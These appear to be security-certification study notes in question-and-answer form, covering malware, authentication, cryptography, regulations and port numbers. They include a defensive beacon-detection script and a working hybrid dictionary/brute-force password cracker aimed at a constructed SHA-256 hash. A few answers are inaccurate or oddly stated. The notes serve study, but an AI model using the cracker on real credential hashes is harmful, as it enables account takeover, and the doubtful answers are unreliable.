What is the best way to capture artifacts of the infection process by fileless viruses?
Capture system memory and PowerShell logs. Fileless viruses often take advantage
of PowerShell to perform actions once they have used a vulnerability in a browser
or browser plug-in to inject themselves into system memory, so there is no file on
disk to recover.
What is associated with the concept of familiarity? What will the attacker do?
Familiarity (liking) is a social engineering principle: the attacker assumes the
persona of a widely known organization or person the victim already trusts.

What is a cognitive password attack?
A cognitive password is a form of knowledge-based authentication that requires
a user to answer a question, presumably something they intrinsically know, to
verify their identity. If you post a lot of personal information about yourself
online, this type of password can easily be bypassed.

What can help to identify malware beaconing behavior?
The beacon's persistence (it keeps coming back)
The beaconing interval (regular, machine-like timing)
The removal of known traffic (filter out allowlisted destinations first)
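An added example, not from the original notes, that turns the three indicators above into a check: group connection log lines per source/destination, drop allowlisted destinations, and flag flows whose inter-arrival time is too regular (low coefficient of variation). The log lines are constructed by build_sample_log and the thresholds are assumptions to tune for your environment.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format (not a real product's): "<date> <time> src=<ip> dst=<ip:port>"
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) src=(?P<src>\S+) dst=(?P<dst>\S+)$")


def build_sample_log():
    """Constructed sample (not real traffic): one host phoning home every 60 s with
    a second or two of jitter, mixed with irregular browsing to another host."""
    base = datetime(2024, 3, 1, 10, 0, 0)
    lines = []
    jitter = [0, 1, -1, 0, 2, 0, -1, 1, 0, 0, 1, -2]
    for i, j in enumerate(jitter):
        ts = base + timedelta(seconds=60 * i + j)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} src=10.0.0.5 dst=203.0.113.7:443")
    for s in [3, 5, 40, 41, 200, 260, 330, 331, 332, 500, 610, 700]:
        ts = base + timedelta(seconds=s)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} src=10.0.0.5 dst=198.51.100.20:443")
    return sorted(lines)


def find_beacons(lines, min_events=8, max_cv=0.1, known_good=()):
    """Persistence: a flow needs at least min_events connections. Known traffic:
    destinations in known_good are dropped. Interval: flows whose gaps have a
    coefficient of variation (stdev / mean) at or below max_cv are flagged."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["dst"] in known_good:
            continue
        seen[(m["src"], m["dst"])].append(
            datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"))
    flagged = {}
    for flow, stamps in seen.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            flagged[flow] = {"events": len(stamps),
                             "interval_s": round(mean, 1), "cv": round(cv, 3)}
    return flagged


if __name__ == "__main__":
    for flow, info in find_beacons(build_sample_log()).items():
        print(flow, info)
```

Real implants add deliberate jitter to defeat exactly this test, so in production you would raise max_cv, look at the distribution of gaps rather than one number, and combine the result with destination reputation.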

What is behavior-based detection?
Activity is evaluated based on the previous behavior of applications, executables,
and the operating system in comparison to the current activity of the system.

Difference between behavior-based detection and anomaly-based detection?
Behavior-based detection records expected patterns concerning the entity being
monitored.

Anomaly-based detection prescribes the baseline for expected patterns based on
its own observation of what normal looks like.
Which cloud based infrastructure is good for
developing app using their programming
environment?
PaaS

Difference between a retinal scan and an iris scan?
Iris scans rely on the matching of patterns on the surface of the eye using near-
infrared imaging, and so are less intrusive than retinal scanning (the subject can
continue to wear glasses, for instance) and much quicker.

How long is the output of common hashing algorithms?
MD5 - 128 bit
SHA-1 - 160 bit
SHA-2 - 224, 256, 384 or 512 bit depending on the variant (SHA-256 is 256 bit)
RIPEMD-160 - 160 bit
NTLM - 128 bit (an MD4 digest of the password)

Difference between continuous delivery and continuous deployment?
Continuous deployment is a software development method in which app and
platform updates are committed to production rapidly and automatically.

Continuous delivery is a software development method in which app and
platform changes are frequently tested and validated so they are always ready
for release; the push to production is still a deliberate step.

What is the most important feature to consider when designing a system on a chip?
space and power savings
What is segmentation containment?
Segmentation-based containment is a means of achieving the isolation of a host
or group of hosts using network technologies and architecture.

What is ECC?
Elliptic curve cryptography

Difference between data purging and wiping?
Data wiping or clearing occurs by using a software tool to overwrite the data on
a hard drive to destroy all electronic data on a hard disk or other media; the
device can be reused.

A purged device is generally not reusable.

Symmetric key algorithms
DES, 3DES, IDEA, AES, Blowfish, Twofish, RC4, RC5, RC6

Asymmetric algorithms
Diffie-Hellman (key agreement), RSA, DSA, ECC; PGP is a program built on these
rather than an algorithm itself

Which cryptographic algorithm is a symmetric stream cipher?
RC4

What is GLBA?
Gramm-Leach-Bliley Act (GLBA) institutes requirements that help protect the
privacy of an individual's financial information held by financial institutions and
others, such as tax preparation companies.
What is SOX?
Sarbanes-Oxley Act (SOX) dictates requirements for storing and retaining
documents relating to an organization's financial and business operations,
including the type of documents to be stored and their retention periods. It is
relevant for any publicly-traded company with a market value of at least $75
million.

What is FERPA?
The Family Educational Rights and Privacy Act (FERPA) requires that educational
institutions implement security and privacy controls for student educational
records.

What is SPI?
information about an individual's race or ethnic origin is classified as Sensitive
Personal Information (SPI).

Which protocol is commonly used to collect information about CPU utilization
and memory usage from network devices?
SNMP

What is Cain and Abel?
Cain and Abel is a popular password cracking tool. It can recover many
password types using methods such as network packet sniffing and cracking
various password hashes by dictionary attacks, brute force, and cryptanalysis
attacks.

What is a rogue anti-virus?
Rogue anti-virus is a form of malicious software and internet fraud that misleads
users into believing there is a virus on their computer and into paying money for
a fake malware removal tool (which actually introduces malware to the computer).
What authentication protocol uses only a username and password?
PAP (Password Authentication Protocol); it sends the credentials in cleartext,
so it should only be used inside an encrypted tunnel.

Your firewall is blocking outbound email traffic that is attempting to be sent.
Which port should you verify is set to ALLOW in the firewall to ensure your
emails are being sent?
25 (SMTP)

What is part of a COPE policy?
Cellular data, remote wipe, location tracking, and MDM

Which access control method provides the most detailed and explicit type of
access control over a resource?
Attribute-based access control (ABAC) provides the most detailed and explicit
type of access control over a resource because it is capable of making access
decisions based on a combination of subject and object attributes, as well as
context-sensitive or system-wide attributes. Information such as group
membership, the OS being used by the user, and even the machine's IP address
could be considered when granting or denying access.

What should be done if a vulnerability exists but cannot be patched?
Identify, implement and document a compensating control

What is the biggest disadvantage of using single sign-on (SSO) for authentication?
It introduces a single point of failure

What should be done first when we are under attack and don't know which assets
have been affected?
Conduct a data criticality and prioritization analysis

What is a smurf attack?
A smurf attack occurs when an attacker sends ICMP echo requests to a subnet
broadcast address with the source spoofed to the victim's IP; every device on
the subnet replies to the victim, using up its bandwidth and processing power.

A smurf attack thus involves sending spoofed broadcast packets to the target
network's router; disabling directed broadcasts on routers defeats it.

Describe a hybrid attack on passwords?
Passwords are taken from dictionaries, with some characters (digits, symbols,
case changes) added to them.
It combines a dictionary attack and a brute-force attack.
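An added example, not from the original notes, of the hybrid attack just described: a small candidate generator that takes dictionary words, applies case and leet mutations (the dictionary part), and appends brute-forced digit and symbol suffixes, then tests each candidate against a hash. The wordlist, the mutation rules and the target are constructed for the example; the target is an unsalted single SHA-256 on purpose, since that is the fast kind of hash that makes the attack cheap, in contrast to a stretched bcrypt/PBKDF2 hash.

```python
import hashlib
from itertools import product

# Constructed mini-wordlist; a real run would use a leaked-password list or a
# company-specific list (product names, local sports teams, the current year).
WORDLIST = ["password", "summer", "welcome", "dragon"]
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})


def word_forms(word):
    """Dictionary part: case and leet variants of one base word, de-duplicated."""
    w = word.lower()
    return list(dict.fromkeys([w, w.capitalize(), w.upper(), w.translate(LEET)]))


def hybrid_candidates(words, max_digits=2, symbols=("", "!", "@", "#")):
    """Hybrid rule: every word form x every digit suffix up to max_digits long
    x every trailing symbol. The suffix loops are the brute-force part."""
    digit_suffixes = [""] + [str(n).zfill(k)
                             for k in range(1, max_digits + 1)
                             for n in range(10 ** k)]
    for word in words:
        for form, digits, sym in product(word_forms(word), digit_suffixes, symbols):
            yield f"{form}{digits}{sym}"


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def crack(target_hex, words, max_digits=2):
    """Return the first candidate whose SHA-256 matches target_hex, else None."""
    for cand in hybrid_candidates(words, max_digits):
        if sha256_hex(cand) == target_hex:
            return cand
    return None


if __name__ == "__main__":
    stolen = sha256_hex("Summer23!")          # constructed "leaked" hash
    print(crack(stolen, WORDLIST))            # Summer23!
    print(sum(1 for _ in hybrid_candidates(WORDLIST)), "candidates tried at most")
```

Four words become 7,104 candidates with two digits and four symbols; that is why a policy of "dictionary word plus a number and a symbol" buys almost nothing, and why the defence is a slow, salted hash rather than complexity rules.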
Difference between a stream cipher and a block cipher?
A stream cipher encrypts one bit (or byte) at a time with a keystream.
A block cipher encrypts fixed-size blocks at a time, e.g. 64-bit blocks (DES)
or 128-bit blocks (AES), and needs a mode of operation for longer messages.

What is FM-200?
A clean-agent gas fire suppression system used in data centers; it extinguishes
fire without water damage to equipment.

What is BAS?
A building automation system (BAS) for offices and data centers ("smart
buildings") can include physical access control systems, but also heating,
ventilation, and air conditioning (HVAC), fire control, power and lighting, and
elevators and escalators

Which physical access management control tool relies upon using a
certificate-based authentication mechanism?
Smart cards

What could be a managerial control?
Mandatory vacation policies, job rotation policies, and separation of duties
policies are great examples of managerial controls.

Penetration testing is also classed as a managerial control.

What technology is NOT PKI/X.509 compliant and cannot be used in those secure functions?
Blowfish: it is a symmetric block cipher, so it cannot sign or be bound to a
certificate the way RSA or ECC keys are.
What is a WAF?
A WAF (web application firewall) can serve as a compensating control and
protect against web application vulnerabilities like SQL injection until the
application can be fully remediated.

What do captive portals rely on?
Captive portals usually rely on 802.1X, and 802.1X uses RADIUS for
authentication.

How can NAC be used?
Network Access Control (NAC) is an approach to computer security that attempts
to unify endpoint security technology (such as anti-virus, host intrusion
prevention, and vulnerability assessment), user or system authentication, and
network security enforcement. When a remote workstation connects to the
network, NAC will place it into a segmented portion of the network (sandbox),
scan it for malware and validate its security controls, and then, based on the
results of those scans, either connect it to the company's networks or place the
workstation into a separate quarantined portion of the network for further
remediation.

An attacker uses the nslookup interactive mode to locate information on a
Domain Name Service (DNS). What command should they type to request the
appropriate records for only name servers?
set type=ns

What is a GPO?
Microsoft's Group Policy Object (GPO) is a collection of Group Policy settings that
defines what a system will look like and how it will behave for a defined group of
users. It allows an administrator to create a policy and deploy it across many
devices in the domain or network.
What program is used for forensic analysis on
imaged drive?
Autopsy

Kunal is building a web application and wants to allow users to connect the
application to Google services and allow other users to access and modify files
and other materials. What open standard should he implement to allow users to
delegate access and control of these resources?
OAuth

What is the difference between a BPA and an MSA?
A master services agreement (MSA) defines most of the terms of service
between two organizations.

A BPA is a business partnership agreement, used when two businesses want to
partner together.

Where can you find Windows Installer transactions?
Windows Application log

Madhuri wants to create her X.509 certificate and store it in the most common
format so that she can easily use it. What format should she export her
certificate in to provide the broadest compatibility?
PEM
Where should you look when investigating a denial of service attack such as a SYN flood?
Output from a protocol analyzer such as Wireshark.
If it was a DDoS attack, NetFlow logs would be the place to look.

What is NGSWG?
Next-generation secure web gateways (NGSWGs) combine many web-based
security functions like data loss prevention (DLP), content decryption and
inspection, cloud access security broker (CASB), threat detection, and web
content filtering into a single solution.

What is the key difference between isolation and containment?
Isolation removes all network connectivity; containment restricts network
connectivity but may not prevent it.

Containment actions can include adding firewall or intrusion prevention system
(IPS) rules, preventing outbound traffic to specific sites, or similar actions.

Which ISO standard focuses on privacy as its main objective?
ISO 27701

What is the best way to quickly and effectively check files for compromise?
The best option is to submit them to an open-source intelligence provider like
VirusTotal. VirusTotal allows you to quickly analyze suspicious files and URLs to
detect types of malware.
What can be removed after an initial vulnerability scan to avoid wasting time
and reduce false positives?
Items classified by the system as Low or as for informational purposes only

Which technique would provide the largest increase in security on a network
with ICS, SCADA, or IoT devices?
user and entity behavior analytics

Which protocol relies on mutual authentication of the client and the server for its security?
LDAPS (the exam answer). Caveat: LDAPS is LDAP over TLS, and mutual
authentication only happens when the client also presents a certificate;
by default only the server is authenticated.

What security features should you use with a workstation or laptop within your organization?
Host-based firewall
Network sniffer
Cable lock
CAT5e STP

What will the "bs" option do with the dd command?
It will set the block size (e.g. dd if=/dev/sda of=disk.img bs=4M)

What is ISA?
The interconnection security agreement (ISA) governs the relationship between
any federal agency and a third party interconnecting their systems.
Difference between RTO and MTTR?
Mean time to repair (MTTR) is a measure of the time taken to correct a fault to
restore the system to full operation. MTTR is often used to describe the average
time to replace or recover a system or product.

Recovery time objective (RTO) is the maximum time an individual IT system may
remain offline following a disaster.

What is DaaS?
Desktop as a Service (DaaS) provides a full virtualized desktop environment from
within a cloud-based service. This is also known as VDI (Virtual Desktop
Infrastructure) and is becoming common in large enterprise businesses focused on
increasing their security and minimizing their operational expenses.

What does MTTR measure?
The average time it takes to repair a network device when it breaks

What port is used by RDP?
3389

What is the difference between ABAC and MAC?
MAC provides the strongest level of protection when it comes to access control.

ABAC provides the most detailed and explicit type of access control over a resource.
What can be used if clients support WPA with pre-shared keys and the back end has RADIUS?
802.1X using EAP with MS-CHAPv2

What security features should be used in the data center?
FM-200, biometric locks, mantrap, antivirus

What is RAID 0 (striping) used for?
Provides data striping across multiple disks to increase performance; no redundancy

What is RAID 1 (mirroring) used for?
Provides redundancy by mirroring the data identically on two hard disks

syslog port
UDP 514

LDAP over SSL/TLS (LDAPS) port
636

iSCSI port
TCP 860
Links data storage facilities over IP

FTPS port
989 and 990

IMAP with SSL (IMAPS) port
993

POP3 with SSL (POP3S) port
995

Microsoft SQL Server port
1433

L2TP port
UDP 1701

PPTP port
TCP 1723

FCIP port
Fibre Channel over IP
3225

iSCSI (target) port
3260

Diameter port
3868

syslog over TLS port
6514

FTP port
20 (data) and 21 (control)

SCP port
22 (runs over SSH)

SFTP port
22 (runs over SSH)

TFTP port
UDP 69

Kerberos port
88

NNTP port
119

RPC/DCOM-SCM port
135

LDAP port
389

SMB (Server Message Block) port
445

SMTP with SSL/TLS port
465 (SMTPS) or 587 (submission with STARTTLS)
